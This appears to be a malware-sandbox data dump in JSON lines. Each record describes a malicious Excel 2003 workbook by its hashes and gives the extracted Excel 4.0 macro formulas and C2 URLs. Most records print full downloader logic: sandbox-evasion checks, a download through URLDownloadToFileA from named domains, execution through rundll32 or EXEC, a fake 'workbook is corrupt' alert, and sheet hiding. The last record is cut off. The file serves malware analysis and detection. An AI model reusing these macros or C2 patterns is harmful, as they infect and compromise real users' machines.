{"version":"0.2","sample":{"sample":"","kind":"file","target":"0f64a36a34a09330f11e4b655933854780397f282ab0ceb776240aa8e37ef495"},"analysis":{"reported":"2020-04-09T16:14:55Z","score":10},"files":[{"filename":"0f64a36a34a09330f11e4b655933854780397f282ab0ceb776240aa8e37ef495","filesize":152576,"md5":"23bca58a825772f1c77c8571b9f3a5a7","sha1":"02dc7c253b0f690bbffa95301c26d116ddcc94e7","sha256":"0f64a36a34a09330f11e4b655933854780397f282ab0ceb776240aa8e37ef495","sha512":"6dae9a911e2f0e418818a6c32733c1b5b0884717f4ecad742345d10f497c4468a3e87fa80ad1b671b91c18f7fe4d8b0717d5b1465b5f92afae955cfc007c2394","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0f64a36a34a09330f11e4b655933854780397f282ab0ceb776240aa8e37ef495.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"dBd75qmNnn\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0f691c43b01329a73dc31fadfabca3f10c3c7c142085f0ae7a458ce688a69e42"},"analysis":{"reported":"2020-04-09T16:14:55Z","score":10},"files":[{"filename":"0f691c43b01329a73dc31fadfabca3f10c3c7c142085f0ae7a458ce688a69e42","filesize":138240,"md5":"ea2e28b38591bf17eb7a0b20ec4372d5","sha1":"f45ffb84f6fd9679e9d432e2a89f7a2766423d4f","sha256":"0f691c43b01329a73dc31fadfabca3f10c3c7c142085f0ae7a458ce688a69e42","sha512":"faf247a43af7bab42641276ac78b06a32691780908506abb3d4b7378178783abaf3baac90327278234f04a82c329fcfcf57e714db880f110cc93431c1983c037","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0f691c43b01329a73dc31fadfabca3f10c3c7c142085f0ae7a458ce688a69e42.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://gengrasjeepram.com/sv.exe"],"attr":{"formulas":"CALL(\"URLMON\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://gengrasjeepram.com/sv.exe\",\"gift.exe\",0,0)\nEXEC(\"gift.exe\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0fb3d7fcebda0622f2a444dcaba2ef647262ce50f1d522ec942d275d228b684e"},"analysis":{"reported":"2020-04-09T16:14:56Z","score":10},"files":[{"filename":"0fb3d7fcebda0622f2a444dcaba2ef647262ce50f1d522ec942d275d228b684e","filesize":209408,"md5":"30824dcdcd47c30c039aa096f14d09dc","sha1":"f3b70d9a80cdde278cb122ce0667692a1e845072","sha256":"0fb3d7fcebda0622f2a444dcaba2ef647262ce50f1d522ec942d275d228b684e","sha512":"e6bd174ce30c0e00dbbf44851a141cb3c54a722d30cb012d44157f0470648bfce2a41103ea176a1a1996e1bd68f5307bbff37412eac8cfe546868745a94320ff","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0fb3d7fcebda0622f2a444dcaba2ef647262ce50f1d522ec942d275d228b684e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"makrrxYpRR\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0fc75e0690625bde4fdd7ca2f81faaf19bf9d95e7f03ca57c5bf844db3e85e7f"},"analysis":{"reported":"2020-04-09T16:14:56Z","score":10},"files":[{"filename":"0fc75e0690625bde4fdd7ca2f81faaf19bf9d95e7f03ca57c5bf844db3e85e7f","filesize":113664,"md5":"8929b3042cc54c43fe3b2f0f23081e02","sha1":"43d8712686a7945607a5c462fc4a7431e7922b86","sha256":"0fc75e0690625bde4fdd7ca2f81faaf19bf9d95e7f03ca57c5bf844db3e85e7f","sha512":"cf6d0fec5aa7578ac21c61f2d57cbb9996ebe1ba5cadaa0feec16936a907c53262a8dd74902e4357568f1212767c06943c84d7c59ab8498e63065390fbf230b7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0fc75e0690625bde4fdd7ca2f81faaf19bf9d95e7f03ca57c5bf844db3e85e7f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NfxRNsxreY\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0fc81b64515bc228dc0cafb1c7f76402d7a87aa3e3a9d8ebe1fa20e7d7a7362c"},"analysis":{"reported":"2020-04-09T16:14:56Z","score":10},"files":[{"filename":"0fc81b64515bc228dc0cafb1c7f76402d7a87aa3e3a9d8ebe1fa20e7d7a7362c","filesize":214016,"md5":"181beb7c0488867438963d7e4e65ebfa","sha1":"b9b41e0374659c678b18e4ca26b64be6ccf42698","sha256":"0fc81b64515bc228dc0cafb1c7f76402d7a87aa3e3a9d8ebe1fa20e7d7a7362c","sha512":"a41208e8cbdfe7c828930c8b7f2bdff9189bd5877396ed9046c963238365157f831fe4a044adb7e1289c23b5f8614d30524587176b2f1fb9eba0e6930a4651a1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0fc81b64515bc228dc0cafb1c7f76402d7a87aa3e3a9d8ebe1fa20e7d7a7362c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv42g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv42g\",\"c:\\Users\\Public\\bug65ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"5HHwydPUjd\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0fce49972669d6001680fc049c52d7707dbe4e0140d13e99881aa22f73755126"},"analysis":{"reported":"2020-04-09T16:14:56Z","score":10},"files":[{"filename":"0fce49972669d6001680fc049c52d7707dbe4e0140d13e99881aa22f73755126","filesize":146944,"md5":"c8fb5af23741554bf47af2dd1b45fdc9","sha1":"ffc018046a78c3ba076c1b31386761d5f81a6e6b","sha256":"0fce49972669d6001680fc049c52d7707dbe4e0140d13e99881aa22f73755126","sha512":"c60ca966bdf886554eee1a51d06a9508decdd540aec5abb6c4769438f11911e0c09d7f2dc4fe4b60910068c6437931f5bd874b612a257d9e79814694293faa43","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0fce49972669d6001680fc049c52d7707dbe4e0140d13e99881aa22f73755126.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pjtcdnrd.pw/ckjbvkf732"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"FrDtWDjOA1\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0fd89ac9b8fb81e51918855c625de31e2ce36aaf307b399a348544901517101f"},"analysis":{"reported":"2020-04-09T16:14:56Z","score":10},"files":[{"filename":"0fd89ac9b8fb81e51918855c625de31e2ce36aaf307b399a348544901517101f","filesize":206336,"md5":"1807b213ed302ad48c90c821a5768c14","sha1":"270d4205a158c954ce3367357a68035021f91d30","sha256":"0fd89ac9b8fb81e51918855c625de31e2ce36aaf307b399a348544901517101f","sha512":"e1c18c6fdefc993fbc3a7f33b25eb0997e887ad2404de24aea2f5e5af31fa6dc65ae485d1e006cede5ef0329f727997e7e57652be78c1bad87189c9c6d5af3f1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0fd89ac9b8fb81e51918855c625de31e2ce36aaf307b399a348544901517101f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2rt5FUqGtN\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0fe22e30603a7b7ee4200922acb2b4d1b5eaa264bf6be374f751db7bbfaa11f2"},"analysis":{"reported":"2020-04-09T16:14:56Z","score":10},"files":[{"filename":"0fe22e30603a7b7ee4200922acb2b4d1b5eaa264bf6be374f751db7bbfaa11f2","filesize":167936,"md5":"3153104b280744aa2e30562e688896b8","sha1":"42a0911d86faee1992ecd65352ab8085c5a28e24","sha256":"0fe22e30603a7b7ee4200922acb2b4d1b5eaa264bf6be374f751db7bbfaa11f2","sha512":"f7ab50941231a203ffceb19965476a4ec4df639f4f40c49d099a7538846621219912188db513fdaf2d58286fa7cacb09a21a1b8fff49427f388bc66feac204fc","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0fe22e30603a7b7ee4200922acb2b4d1b5eaa264bf6be374f751db7bbfaa11f2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"B5leVjI2Kp\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"0feac2b614c775064a88a693ee5566f3284a5fcbbcb40df95292e061016881dc"},"analysis":{"reported":"2020-04-09T16:14:56Z","score":10},"files":[{"filename":"0feac2b614c775064a88a693ee5566f3284a5fcbbcb40df95292e061016881dc","filesize":104448,"md5":"8f93f35b2628f7348885c8145030f3b0","sha1":"000dc2c6fa56138bf48849ec45a9a12a41b22f1d","sha256":"0feac2b614c775064a88a693ee5566f3284a5fcbbcb40df95292e061016881dc","sha512":"bc6bd5ac682218471e2f49eff42cc634373665b41f0cebbf74198b961a24f00e0c3abf0ba9074f2de8ed33b14564c60fa23d94eaad4036d7561e54e2ebc97701","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"0feac2b614c775064a88a693ee5566f3284a5fcbbcb40df95292e061016881dc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"fuhpM6D9v6\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"100287ec9bada99c1421e75716d88aafb9a4f142b32d1d9953799b08135c779d"},"analysis":{"reported":"2020-04-09T16:14:56Z","score":10},"files":[{"filename":"100287ec9bada99c1421e75716d88aafb9a4f142b32d1d9953799b08135c779d","filesize":209408,"md5":"91e9fb681de4fbfd1053001ac500cdfc","sha1":"1beed2174b9bfdd2dd834d1568b97e00b54706ce","sha256":"100287ec9bada99c1421e75716d88aafb9a4f142b32d1d9953799b08135c779d","sha512":"49dd660e005ac80d7108af199b15b5712c11778a2d81b1da8d7676254e8f031854c1892b45e00c17b54d5ff250ff39849ba4a0552f676ca44d5ab260c655d45d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"100287ec9bada99c1421e75716d88aafb9a4f142b32d1d9953799b08135c779d.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yRXf9SMD0z\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"101e693c62cf7cd5bd3e2d9a0a99fcc941294d1f75cc717445743fddd6395df7"},"analysis":{"reported":"2020-04-09T16:14:56Z","score":10},"files":[{"filename":"101e693c62cf7cd5bd3e2d9a0a99fcc941294d1f75cc717445743fddd6395df7","filesize":168448,"md5":"ef3f079ba3f0ded5dafae3c7015870f0","sha1":"29fc64473494d7c4a9dfaddc795634803f0253c4","sha256":"101e693c62cf7cd5bd3e2d9a0a99fcc941294d1f75cc717445743fddd6395df7","sha512":"efb1b0c99b67334242a99462c328e578b70b0486ffe4f728bee30c66fe3af2c9e77c73b761587a7380ec88964bac9a4c62c881cab9df2c22196fe29a1dfba100","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"101e693c62cf7cd5bd3e2d9a0a99fcc941294d1f75cc717445743fddd6395df7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FE9WDPfNgi\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"10211d56f38967cad2b69eba83ad5fede520b2e356323244c081b8b6ee219bec"},"analysis":{"reported":"2020-04-09T16:14:57Z","score":10},"files":[{"filename":"10211d56f38967cad2b69eba83ad5fede520b2e356323244c081b8b6ee219bec","filesize":167424,"md5":"7836f779e9323f7cd3659a61b22dffc5","sha1":"bdef17e0565d9d7da31e971cdd66f4ff99adb739","sha256":"10211d56f38967cad2b69eba83ad5fede520b2e356323244c081b8b6ee219bec","sha512":"b89e48ad712dd1f881ea5b1d124599180cd10f81d33ac9a39eb97c23806f2f9eb223633e179b8bd386729006c462c9bb515b322adec7606528b21235d0987c83","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"10211d56f38967cad2b69eba83ad5fede520b2e356323244c081b8b6ee219bec.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"hmueXKBtFe\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$18C$2\u003c770,CLOSE(FALSE),)\nIF(R$19C$2\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$39C$10)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"103faae784a5bdc567cbcd3bad45155368d383eb7d186429be0e6eba5586e75e"},"analysis":{"reported":"2020-04-09T16:14:57Z","score":10},"files":[{"filename":"103faae784a5bdc567cbcd3bad45155368d383eb7d186429be0e6eba5586e75e","filesize":168960,"md5":"8ac2d241fb3df0c9a03cdd3b0ae3c345","sha1":"e079d7843eb4b05e3b6a9407d378183b2843261f","sha256":"103faae784a5bdc567cbcd3bad45155368d383eb7d186429be0e6eba5586e75e","sha512":"2172e0ce4d4f2fb1e48862b893f560edc3bcc9753ac5ec56ca1861c8796cb80050edd1a93f32551497d4dc8fb3738bbfdb701327454c7f86be082ad52b31c64d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"103faae784a5bdc567cbcd3bad45155368d383eb7d186429be0e6eba5586e75e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hff2f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"9RVdsQLue9\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"1046470742f10bf6b725bd41616a1dfe7425b7cbc9114aa5c0ce266f3be9dfa0"},"analysis":{"reported":"2020-04-09T16:14:57Z","score":10},"files":[{"filename":"1046470742f10bf6b725bd41616a1dfe7425b7cbc9114aa5c0ce266f3be9dfa0","filesize":209408,"md5":"63d70749e7b865a9cb2a62aa698dd375","sha1":"f2815511aeb67890b66932e3aded05d5e4f5b1c6","sha256":"1046470742f10bf6b725bd41616a1dfe7425b7cbc9114aa5c0ce266f3be9dfa0","sha512":"e499db1d1a42fd739688e809a62283d8b58a34920ddb4cb2c3e44004bd0b9b0d2ef3958b71b61a1b9cb58e21209322e569fcc25d08e67660911d20c0428b9622","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"1046470742f10bf6b725bd41616a1dfe7425b7cbc9114aa5c0ce266f3be9dfa0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"kAAIpbRNor\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"105386831fd85a850307d38e4cb3f1ef09d8905749cf33dbf65a34b2a682694f"},"analysis":{"reported":"2020-04-09T16:14:57Z","score":10},"files":[{"filename":"105386831fd85a850307d38e4cb3f1ef09d8905749cf33dbf65a34b2a682694f","filesize":177152,"md5":"7b3a0ea15a37f42483c6f87df67d674e","sha1":"6c7a9230abb86a7fbf0e5080dc122c85b9b3afda","sha256":"105386831fd85a850307d38e4cb3f1ef09d8905749cf33dbf65a34b2a682694f","sha512":"6a7d8f4253a386d01e8607f9040675a9fa107850f3a3c78d41dbf827d2e8391163b3be9211c6b9ee1afd2d8044370642400128d72d059867e5e486b54dc68b3c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"105386831fd85a850307d38e4cb3f1ef09d8905749cf33dbf65a34b2a682694f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"SkNoplB7d3\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"10607b342668bfbf20be527b2d59f307193c582e3f69c379b32ede538df70a8d"},"analysis":{"reported":"2020-04-09T16:14:58Z","score":10},"files":[{"filename":"10607b342668bfbf20be527b2d59f307193c582e3f69c379b32ede538df70a8d","filesize":116224,"md5":"0e04ac8b90aa8d581d89dd90ddbbe86a","sha1":"acc034842c618b27672e8d74a8ab75ea52129d4d","sha256":"10607b342668bfbf20be527b2d59f307193c582e3f69c379b32ede538df70a8d","sha512":"beb670b3b33f8e376421b74b1c30c34e5c2229bf7d5098a72d422a669904accb42a460bf5a3c411a07af2f9346c7f1a81050a9eba4c9f1b1187c605823cc2881","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"10607b342668bfbf20be527b2d59f307193c582e3f69c379b32ede538df70a8d.xls"}